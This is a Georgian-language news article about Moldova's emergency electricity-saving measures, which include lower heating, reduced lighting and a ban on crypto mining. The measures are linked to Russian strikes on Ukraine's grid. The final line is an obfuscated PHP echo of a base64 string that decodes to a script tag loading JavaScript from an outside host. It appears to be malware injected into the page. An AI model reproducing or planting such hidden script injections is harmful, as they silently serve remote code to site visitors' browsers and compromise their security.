celsiusi
ავერსი საქკაბელი
მოლდოვის ხელისუფლებამ ელექტროენერგიის დაზოგვისთვის საჭირო ზომები დაამტკიცა.
 
ქვეყნის საგანგებო სიტუაციების კომისიის განკარგულებით, მოქალაქეებს ურჩევენ, დილის საათებში არ ისარგებლონ ლიფტით, შენობებში ტემპერატურა შეამცირონ, შეიზღუდოს ესკალატორების მუშაობა და შემცირდეს სახლების განათება. ამის შესახებ ინფორმაციას მოლდოვური მედია ავრცელებს.
 
კომისიის განკარგულებითვე, შენობებში სამუშაო საათებში ჰაერის ტემპერატურა 19 გრადუსამდე უნდა შემცირდეს, ხოლო არასამუშაო საათებში 15 გრადუსამდე.
 
ასევე რეკომენდებულია, რომ შენობების შიდა განათება 30%-ით შემცირდეს, გაითიშოს შადრევნები, დეკორაციებისა და სარეკლამო აბრების განათება.
 
იმ საწარმოებს, რომლებიც ელექტრო ღუმელებს იყენებენ, ურჩევენ, მათი გამოყენება პიკის საათში შეზღუდონ.
 
ადგილობრივ და ცენტრალურ მთავრობას მოუწოდებენ, შეისწავლონ ელექტროენერგიის დაზოგვის შესაძლებლობები, რათა დენის გათიშვამ არ შეუქმნას საფრთხე მოქალაქეების უსაფრთხოებას და ჯანმრთელობას. ასევე რეკომენდებულია გარე განათების გათიშვა დღის საათებში. ამავე პერიოდში უნდა აიკრძალოს კრიპტოაქტივების მოპოვება და კრიპტოვალუტების მაინინგისთვის საჭირო აღჭურვილობის იმპორტი.
 
შეგახსენებთ, რომ რუსეთის მიერ უკრაინის ენერგეტიკულ ინფრასტრუქტურაზე მიტანილმა იერიშებმა მოლდოვის ენერგომომარაგებაშიც შექმნა პრობლემები, რადგანაც მოლდოვას არ აქვს საშუალება, ენერგია უკრაინიდან შეიძინოს.
367
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");